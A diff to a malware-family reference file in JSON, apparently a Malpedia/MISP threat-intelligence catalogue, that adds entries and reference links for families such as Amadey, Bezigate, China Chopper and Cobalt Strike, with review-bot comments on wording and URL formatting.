@@ -3301,6 +4058,21 @@
 "uuid": "ad4e6779-59a6-4ad6-98de-6bd871ddb271",
 "value": "Alureon"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey",
+ "https://twitter.com/0xffff0800/status/1062948406266642432",
+ "https://twitter.com/ViriBack/status/1062405363457118210",
+ "https://krabsonsecurity.com/2019/02/13/analyzing-amadey-a-simple-native-malware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "77f2c81f-be07-475a-8d77-f59b4847f696",
+ "value": "Amadey"
+ },
 {
 "description": "",
 "meta": {
@@ -3317,6 +4089,20 @@
 "uuid": "ce25929c-0358-477c-a85e-f0bdfcc99a54",
 "value": "AMTsol"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.anatova_ransom",
+ "https://www.bleepingcomputer.com/news/security/new-anatova-ransomware-supports-modules-for-extra-functionality/",
+ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/happy-new-year-2019-anatova-is-here/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "2a28ad28-8ba5-4b8b-9652-bc0cdd37b2c4",
+ "value": "Anatova Ransomware"
+ },
 {
 "description": "",
 "meta": {
@@ -3325,17 +4111,18 @@
 "https://blog.fortinet.com/2014/04/16/a-good-look-at-the-andromeda-botnet",
 "https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation",
 "https://blog.avast.com/andromeda-under-the-microscope",
- "https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features",
- "http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/",
+ "https://blog.fortinet.com/2014/05/19/new-anti-analysis-tricks-in-andromeda-2-08",
 "http://blog.morphisec.com/andromeda-tactics-analyzed",
 "https://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis",
 "http://resources.infosecinstitute.com/andromeda-bot-analysis/",
+ "https://blog.fortinet.com/2014/04/23/andromeda-2-7-features",
 "http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/",
- "https://blog.fortinet.com/2014/05/19/new-anti-analysis-tricks-in-andromeda-2-08",
+ "https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features",
 "https://blogs.technet.microsoft.com/mmpc/2017/12/04/microsoft-teams-up-with-law-enforcement-and-other-partners-to-disrupt-gamarue-andromeda/",
 "https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/",
+ "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf",
 "https://eternal-todo.com/blog/andromeda-gamarue-loves-json",
- "https://blog.fortinet.com/2014/04/23/andromeda-2-7-features",
+ "http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/",
 "https://byte-atlas.blogspot.ch/2015/04/kf-andromeda-bruteforcing.html"
 ],
 "synonyms": [
@@ -3471,6 +4258,19 @@
 "uuid": "1a4f99cc-c078-41f8-9749-e1dc524fc795",
 "value": "ARS VBS Loader"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.artra",
+ "https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "05de9c50-5958-4d02-b1a0-c4a2367c2d22",
+ "value": "Artra Downloader"
+ },
 {
 "description": "",
 "meta": {
@@ -3626,7 +4426,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora",
- "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/"
+ "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/",
+ "https://www.bleepingcomputer.com/ransomware/decryptor/how-to-decrypt-the-aurora-ransomware-with-auroradecrypter/"
 ],
 "synonyms": [],
 "type": []
@@ -3673,6 +4474,21 @@
 "uuid": "606b160a-5180-4255-a1db-b2b9e8a52e95",
 "value": "Aveo"
 },
+ {
+ "description": "Information stealer which uses AutoIT for wrapping.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria",
+ "https://blog.yoroi.company/research/the-ave_maria-malware/"
+ ],
+ "synonyms": [
+ "AVE_MARIA"
+ ],
+ "type": []
+ },
+ "uuid": "6bae792a-c2d0-42eb-b9e0-6ef1d83f9b25",
+ "value": "Ave Maria"
+ },
 {
 "description": "",
 "meta": {
@@ -3708,8 +4524,10 @@
 "https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/",
 "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan",
 "http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html",
+ "https://blog.minerva-labs.com/azorult-now-as-a-signed-google-update",
 "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside",
 "https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/",
+ "https://www.blueliv.com/blog-news/research/azorult-crydbrox-stops-sells-malware-credential-stealer/",
 "https://research.checkpoint.com/the-emergence-of-the-new-azorult-3-3/"
 ],
 "synonyms": [
@@ -3740,6 +4558,19 @@
 "uuid": "947dffa1-0184-48d4-998e-1899ad97e93e",
 "value": "Babar"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.babylon_rat",
+ "https://twitter.com/KorbenD_Intel/status/1110654679980085262"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "1a196c09-f7cd-4a6e-bc3c-2489121b5381",
+ "value": "BabyLon RAT"
+ },
 {
 "description": "",
 "meta": {
@@ -3753,6 +4584,19 @@
 "uuid": "30c2e5c6-851d-4f3a-8b6e-2e7b69a26467",
 "value": "BABYMETAL"
 },
+ {
+ "description": "FireEye describes BACKBEND as a secondary downloader used as a backup mechanism in the case the primary backdoor is removed. When executed, BACKBEND checks for the presence of the mutexes MicrosoftZj or MicrosoftZjBak (both associated with BACKSPACE variants). If either of the mutexes exist, the malware exits.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.backbend",
+ "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "934da8b2-f66e-4056-911e-1da09216e8b8",
+ "value": "BACKBEND"
+ },
 {
 "description": "",
 "meta": {
@@ -3811,11 +4655,12 @@
 "value": "BadEncript"
 },
 {
- "description": "",
+ "description": "BADFLICK, a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.badflick",
- "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html"
+ "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html",
+ "https://blog.amossys.fr/badflick-is-not-so-bad.html"
 ],
 "synonyms": [],
 "type": []
@@ -3866,6 +4711,22 @@
 "uuid": "4038c3bc-b559-45bb-bac1-9665a54dedf9",
 "value": "Bahamut (Windows)"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.baldir",
+ "https://blog.malwarebytes.com/threat-analysis/2019/04/say-hello-baldr-new-stealer-market/",
+ "https://www.youtube.com/watch?v=E2V4kB_gtcQ"
+ ],
+ "synonyms": [
+ "Baldr"
+ ],
+ "type": []
+ },
+ "uuid": "7024893a-96fe-4de4-bb04-c1d4794a4c95",
+ "value": "Baldir"
+ },
 {
 "description": "",
 "meta": {
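Review bot: The new BADFLICK description is a sentence fragment, `BADFLICK, a backdoor that is capable of ...`, unlike the other descriptions this commit adds; `"BADFLICK is a backdoor capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration."` reads as the neighbouring BACKBEND entry does. The BACKBEND and Baldir hunks on this line raise nothing.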
@@ -3976,6 +4837,19 @@
 "uuid": "cad1d6db-3a6c-4d67-8f6e-627d8a168d6a",
 "value": "BBSRAT"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.beapy",
+ "https://www.symantec.com/blogs/threat-intelligence/beapy-cryptojacking-worm-china"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "404e8121-bced-4320-a984-2b490fad90f8",
+ "value": "Beapy"
+ },
 {
 "description": "",
 "meta": {
@@ -3989,7 +4863,7 @@
 "value": "Bedep"
 },
 {
- "description": "",
+ "description": "BEENDOOR is a XMPP based trojan. It is capable of taking screenshots of the victim's desktop.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.beendoor",
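Review bot: The new BEENDOOR description has a grammar slip, `a XMPP based trojan`; `"BEENDOOR is an XMPP-based trojan. It is capable of taking screenshots of the victim's desktop."` is the intended wording. The surrounding entry's `"value"` is lower-case `beendoor` while the description uses `BEENDOOR`, which is pre-existing and not changed here. The Beapy hunk sharing this line raises nothing.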
@@ -4001,12 +4875,38 @@
 "uuid": "e2dca2b5-7ca0-4654-ae3d-91dab60dfd90",
 "value": "beendoor"
 },
+ {
+ "description": "Once set up in the system, Trojan.Belonard replaces the list of available game servers in the game client and creates proxies on the infected computer to spread the Trojan. As a rule, proxy servers show a lower ping, so other players will see them at the top of the list. By selecting one of them, a player gets redirected to a malicious server where their computer become infected with Trojan.Belonard.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.belonard",
+ "https://news.drweb.com/show/?i=13135&c=23&lng=en&p=0"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "40c48c99-7d33-4f35-92f1-937c3686afa7",
+ "value": "Belonard"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.berbomthum",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/cybercriminals-use-malicious-memes-that-communicate-with-malware/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "6944cbe7-db95-422d-8751-98c9fc4f0b12",
+ "value": "Berbomthum"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bernhardpos",
- "https://www.morphick.com/resources/news/bernhardpos-new-pos-malware-discovered-morphick"
+ "https://securitykitten.github.io/2015/07/14/bernhardpos.html"
 ],
 "synonyms": [],
 "type": []
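Review bot: The BernhardPOS part of this hunk replaces the Morphick reference with `https://securitykitten.github.io/2015/07/14/bernhardpos.html` instead of appending it, whereas every other reference change in this commit (Pirrit, Bozok, Alma Communicator, Alice ATM) adds to the list. If the Morphick URL was dropped only because it no longer resolves, the entry loses the vendor attribution for the original analysis; keeping the old URL alongside the new one, or recording an archived copy of it, preserves that provenance. The Belonard and Berbomthum additions in the same hunk raise nothing.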
@@ -4036,6 +4936,19 @@
 "uuid": "837c5618-69dc-4817-8672-b3d7ae644f5c",
 "value": "BetaBot"
 },
+ {
+ "description": "Bezigate is a Trojan horse that opens a back door on the compromised computer. It may also download potentially malicious files. \r\n\r\nThe Trojan may perform the following actions: \r\nList, move, and delete drives\r\nList, move, and delete files\r\nList processes and running Windows titles\r\nList services\r\nList registry values\r\nKill processes\r\nMaximize, minimize, and close windows\r\nUpload and download files\r\nExecute shell commands\r\nUninstall itself",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bezigate",
+ "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "29f45180-cb57-4655-8812-eb814c2a0b0e",
+ "value": "Bezigate"
+ },
 {
 "description": "",
 "meta": {
@@ -4063,6 +4976,20 @@
 "uuid": "42ed9fc4-08ba-4c1c-bf15-d789ee4e3ca6",
 "value": "BillGates"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.biodata",
+ "https://unit42.paloaltonetworks.com/unit42-recent-inpage-exploits-lead-multiple-malware-families/",
+ "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "96bcaa83-998b-4fb2-a4e7-a2d33c6427d7",
+ "value": "BioData"
+ },
 {
 "description": "",
 "meta": {
@@ -4091,6 +5018,20 @@
 "uuid": "3e072464-6fa6-4977-9b64-08f86d1062fc",
 "value": "Bitsran"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitter_rat",
+ "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/",
+ "https://www.forcepoint.com/blog/security-labs/bitter-targeted-attack-against-pakistan"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "265f96d1-fdd4-4dec-b7ca-51ae6f726634",
+ "value": "Bitter RAT"
+ },
 {
 "description": "BKA Trojaner is a screenlocker ransomware that was active in 2011, displaying a police-themed message in German language.",
 "meta": {
@@ -4106,6 +5047,22 @@
 "uuid": "ea06f87c-148c-49e5-afec-7012cb2b4f0a",
 "value": "BKA Trojaner"
 },
+ {
+ "description": "a backdoor that obfuscates its communications as normal traffic to legitimate websites such as Github and Microsoft's Technet portal.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcoffee",
+ "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html",
+ "https://attack.mitre.org/software/S0069/",
+ "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf",
+ "http://malware-log.hatenablog.com/entry/2015/05/18/000000_1"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "ff660bf2-a9e4-4973-be0c-9f6618e40899",
+ "value": "BLACKCOFFEE"
+ },
 {
 "description": "",
 "meta": {
@@ -4113,6 +5070,7 @@
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy",
 "https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/",
 "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/",
+ "https://marcusedmondson.com/2019/01/18/black-energy-analysis/",
 "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/"
 ],
 "synonyms": [],
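Review bot: The new BLACKCOFFEE description begins with a lower-case fragment, `a backdoor that obfuscates its communications ...`, and writes `Github` and `Technet` for the product names `GitHub` and `TechNet`; `"BLACKCOFFEE is a backdoor that obfuscates its communications as normal traffic to legitimate websites such as GitHub and Microsoft's TechNet portal."` matches the form of the other descriptions added in this commit. The Bitter RAT and BlackEnergy hunks on this line raise nothing.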
@@ -4151,6 +5109,22 @@
 "uuid": "6a5bd819-5fbc-437b-92c4-ce0dfb5c67f8",
 "value": "BlackRevolution"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackrouter",
+ "https://www.bleepingcomputer.com/news/security/blackrouter-ransomware-promoted-as-a-raas-by-iranian-developer/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/legitimate-application-anydesk-bundled-with-new-ransomware-variant/"
+ ],
+ "synonyms": [
+ "BLACKHEART"
+ ],
+ "type": []
+ },
+ "uuid": "0b235fbf-c191-47c0-ae83-9386a64b1c79",
+ "value": "BlackRouter"
+ },
 {
 "description": "",
 "meta": {
@@ -4226,7 +5200,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bozok",
- "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html"
+ "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html",
+ "https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe"
 ],
 "synonyms": [],
 "type": []
@@ -4234,6 +5209,19 @@
 "uuid": "f9d0e934-879c-4668-b959-6bf7bdc96f5d",
 "value": "Bozok"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.brain",
+ "https://www.welivesecurity.com/2017/01/18/flashback-wednesday-pakistani-brain/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "1619ee64-fc54-47c0-8ee1-8b786fefc0fd",
+ "value": "BRAIN"
+ },
 {
 "description": "",
 "meta": {
@@ -4263,7 +5251,20 @@
 "value": "BravoNC"
 },
 {
- "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\хп-пробив\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n",
+ "description": "This is a backdoor which FireEye call the Breach Remote Administration Tool (BreachRAT), written in C++. The malware name is derived from the hardcoded PDB path found in the RAT: C:\\Work\\Breach Remote Administration Tool\\Release\\Client.pdb",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.breach_rat",
+ "https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "52cf2986-89e8-463d-90b6-e4356c9777e7",
+ "value": "BreachRAT"
+ },
+ {
+ "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. 
C:\\Users\\Exclusiv\\Desktop\\\u0445\u043f-\u043f\u0440\u043e\u0431\u0438\u0432\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader"
@@ -4288,6 +5289,19 @@
 "uuid": "55d343a1-7e80-4254-92eb-dfb433b91a90",
 "value": "Bredolab"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.brushaloader",
+ "https://blog.talosintelligence.com/2019/02/combing-through-brushaloader.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "75a03c4f-8a97-4fc0-a69e-b2e73e4564fc",
+ "value": "BrushaLoader"
+ },
 {
 "description": "",
 "meta": {
@@ -4328,6 +5342,20 @@
 "uuid": "d29786c6-2cc0-4e2f-97b0-242a1d9e9bf8",
 "value": "BTCWare"
 },
+ {
+ "description": "BUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy. This backdoor collects system information, including the operating system version and hostname, and includes functionality to check, upload, and register plugins that can further enhance its capabilities.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bubblewrap",
+ "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html",
+ "https://attack.mitre.org/software/S0043/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d114ee6c-cf7d-408a-8077-d59e736f5a66",
+ "value": "BUBBLEWRAP"
+ },
 {
 "description": "",
 "meta": {
@@ -4345,10 +5373,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.buhtrap",
- "https://www.group-ib.com/brochures/gib-buhtrap-report.pdf",
+ "https://malware-research.org/carbanak-source-code-leaked/",
 "https://www.symantec.com/connect/blogs/russian-bank-employees-received-fake-job-offers-targeted-email-attack",
+ "https://www.welivesecurity.com/2015/04/09/operation-buhtrap/",
+ "https://www.group-ib.com/brochures/gib-buhtrap-report.pdf",
 "https://www.arbornetworks.com/blog/asert/diving-buhtrap-banking-trojan-activity/",
- "https://www.welivesecurity.com/2015/04/09/operation-buhtrap/"
+ "https://blog.dcso.de/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/"
 ],
 "synonyms": [
 "Ratopak"
@@ -4381,8 +5411,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.bunitu",
+ "https://malwarebreakdown.com/2018/03/21/fobos-malvertising-campaign-delivers-bunitu-proxy-trojan-via-rig-ek/",
 "https://zerophagemalware.com/2017/06/07/rig-ek-via-fake-eve-online-website-drops-bunitu/",
 "http://malware-traffic-analysis.net/2017/05/09/index.html",
+ "https://broadanalysis.com/2019/04/12/rig-exploit-kit-delivers-bunitu-malware/",
 "https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/",
 "https://blog.malwarebytes.com/threat-analysis/2015/08/whos-behind-your-proxy-uncovering-bunitus-secrets/"
 ],
@@ -4505,6 +5537,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cannon",
+ "https://www.vkremez.com/2018/11/lets-learn-in-depth-on-sofacy-canon.html",
 "https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/"
 ],
 "synonyms": [],
@@ -4518,6 +5551,7 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak",
+ "https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-one-a-rare-occurrence.html",
 "https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html",
 "https://www.fox-it.com/en/wp-content/uploads/sites/11/Anunak_APT-against-financial-institutions2.pdf",
 "https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf"
@@ -4547,7 +5581,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cardinal_rat",
- "http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412"
+ "http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412",
+ "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/"
 ],
 "synonyms": [],
 "type": []
@@ -4555,6 +5590,19 @@
 "uuid": "3d3da4c0-004c-400c-9da6-f83fd35d907e",
 "value": "Cardinal RAT"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.carrotbat",
+ "https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "4ad06a5f-12e6-44ae-9547-98ee62114357",
+ "value": "CarrotBat"
+ },
 {
 "description": "ESET describes Casper as a well-developed reconnaissance tool, making extensive efforts to remain unseen on targeted machines. Of particular note are the specific strategies adopted against anti-malware software. Casper was used against Syrian targets in April 2014, which makes it the most recent malware from this group publicly known at this time.",
 "meta": {
@@ -4714,6 +5762,22 @@
 "uuid": "2137a0ce-8d06-4538-ad0b-6ab6ec865493",
 "value": "ChewBacca"
 },
+ {
+ "description": "a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinachopper",
+ "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html",
+ "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html",
+ "https://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html",
+ "https://attack.mitre.org/software/S0020/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "0d8f0bb7-e14f-4b85-baa1-6ec951aa6c53",
+ "value": "CHINACHOPPER"
+ },
 {
 "description": "Adware that shows advertisements using plugin techniques for popular browsers",
 "meta": {
@@ -4829,18 +5893,36 @@
 "value": "CMSTAR"
 },
 {
- "description": "Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to:\r\n\r\n* Execute commands\r\n* Log keystrokes\r\n* Upload/download files\r\n* SOCKS proxy\r\n* Privilege escalation\r\n* Mimikatz\r\n* Port scanning\r\n* Lateral Movement\r\n\r\nThe Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.",
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.coalabot",
+ "https://malware.dontneedcoffee.com/2017/10/coalabot-http-ddos-bot.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "7acd9a27-f550-4c47-9fc8-429b61b04217",
+ "value": "CoalaBot"
+ },
+ {
+ "description": "Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. 
Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.\r\n\r\nThe Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike",
 "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html",
 "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
 "https://github.com/JPCERTCC/aa-tools/blob/master/cobaltstrikescan.py",
- "https://www.lac.co.jp/lacwatch/people/20180521_001638.html",
+ "https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html",
+ "https://blog.cobaltstrike.com/",
+ "https://www.cobaltstrike.com/support",
 "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html",
- "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/",
+ "http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems",
+ "https://www.lac.co.jp/lacwatch/people/20180521_001638.html",
+ "https://401trg.com/burning-umbrella/ ",
+ "https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/",
 "https://pylos.co/2018/11/18/cozybear-in-from-the-cold/",
- "https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html"
+ "http://cyberforensicator.com/2018/12/23/dissecting-cozy-bears-malicious-lnk-file/"
 ],
 "synonyms": [],
 "type": []
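Review bot: The new reference `"https://401trg.com/burning-umbrella/ "` carries a trailing space inside the string, so any consumer that turns refs into links or deduplicates them across clusters sees a distinct, malformed URL; it should read `"https://401trg.com/burning-umbrella/",`. The same hunk also adds `"https://blog.cobaltstrike.com/"` and `"https://www.cobaltstrike.com/support"`, which are vendor landing pages rather than analyses and are the only refs in this entry that do not point at a specific article; that may be deliberate, but it is worth confirming they were meant to go here rather than a more specific page. The hunk begins on the previous physical line.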
@@ -5061,11 +6143,13 @@
 "https://www.honeynet.org/files/KYE-Conficker.pdf",
 "https://www.sophos.com/fr-fr/medialibrary/PDFs/marketing%20material/confickeranalysis.pdf",
 "http://www.csl.sri.com/users/vinod/papers/Conficker/addendumC/index.html",
+ "https://www.kaspersky.com/about/press-releases/2009_kaspersky-lab-analyses-new-version-of-kido--conficker",
 "https://github.com/tillmannw/cnfckr",
 "http://www.confickerworkinggroup.org/wiki/uploads/Conficker_Working_Group_Lessons_Learned_17_June_2010_final.pdf",
 "http://contagiodump.blogspot.com/2009/05/win32conficker.html"
 ],
 "synonyms": [
+ "Kido",
 "downadup",
 "traffic converter"
 ],
@@ -5129,6 +6213,19 @@
